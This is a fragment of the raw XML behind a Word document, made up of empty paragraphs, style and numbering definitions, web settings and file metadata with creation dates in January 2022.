    <w:p w14:paraId="7EF344E2" w14:textId="55A67B86" w:rsidR="00484430" w:rsidRDefault="00484430" w:rsidP="00A734A3">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EDDB365" w14:textId="4A38233A" w:rsidR="00484430" w:rsidRDefault="00484430" w:rsidP="00A734A3">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66AC3385" w14:textId="77417225" w:rsidR="00484430" w:rsidRDefault="00484430" w:rsidP="00A734A3">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24C4E6CF" w14:textId="77777777" w:rsidR="00484430" w:rsidRPr="00A734A3" w:rsidRDefault="00484430" w:rsidP="00A734A3">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00484430" w:rsidRPr="00A734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30F6B0B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="074AE2E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52DB60D3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DE88B56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E22BE0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="748A66C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D7C2E0A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9586DE68"/>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A61A31"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E3D4CD04"/>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EF3"/>
    <w:rsid w:val="00074ED1"/>
    <w:rsid w:val="00077787"/>
    <w:rsid w:val="001100B8"/>
    <w:rsid w:val="001D4A3D"/>
    <w:rsid w:val="001D6E66"/>
    <w:rsid w:val="0028799E"/>
    <w:rsid w:val="002B2DB1"/>
    <w:rsid w:val="002E3EF7"/>
    <w:rsid w:val="003363AA"/>
    <w:rsid w:val="00340483"/>
    <w:rsid w:val="0036588D"/>
    <w:rsid w:val="003858A5"/>
    <w:rsid w:val="00484430"/>
    <w:rsid w:val="004E6D4A"/>
    <w:rsid w:val="00684D8C"/>
    <w:rsid w:val="006D748D"/>
    <w:rsid w:val="006F37C8"/>
    <w:rsid w:val="008B4E0C"/>
    <w:rsid w:val="0095515C"/>
    <w:rsid w:val="009D77E7"/>
    <w:rsid w:val="009F331E"/>
    <w:rsid w:val="00A734A3"/>
    <w:rsid w:val="00A73FC5"/>
    <w:rsid w:val="00AE7529"/>
    <w:rsid w:val="00B3293C"/>
    <w:rsid w:val="00B46E83"/>
    <w:rsid w:val="00B70678"/>
    <w:rsid w:val="00B77EE2"/>
    <w:rsid w:val="00B82F4E"/>
    <w:rsid w:val="00BC4C7A"/>
    <w:rsid w:val="00BC5B77"/>
    <w:rsid w:val="00C45A0A"/>
    <w:rsid w:val="00DB4FEC"/>
    <w:rsid w:val="00E12A60"/>
    <w:rsid w:val="00EF1EF3"/>
    <w:rsid w:val="00F17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F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34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1D6E66"/>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A734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34A3"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
      <w:color w:val="5A5A5A" w:themeColor="text1" w:themeTint="A5"/>
      <w:spacing w:val="15"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="00A734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4A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34A3"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A734A3"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading1Char">
    <w:name w:val="Heading 1 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading1"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00A734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34A3"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BalloonText">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="BalloonTextChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00B77E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EE2"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="004E6D4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6D4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6E66"/>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34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1D6E66"/>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A734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34A3"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
      <w:color w:val="5A5A5A" w:themeColor="text1" w:themeTint="A5"/>
      <w:spacing w:val="15"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="00A734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4A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34A3"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A734A3"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading1Char">
    <w:name w:val="Heading 1 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading1"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00A734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34A3"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BalloonText">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="BalloonTextChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00B77E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EE2"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="004E6D4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6D4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6E66"/>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083548">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="106282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354719">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="10638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02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JamesGastelum@GoodSecurity.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741</Words>
  <Characters>4227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Hausknecht</dc:creator>
  <cp:lastModifiedBy>Corvette</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-01-15T22:55:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-01-15T22:55:00Z</dcterms:modified>
</cp:coreProperties>
</file>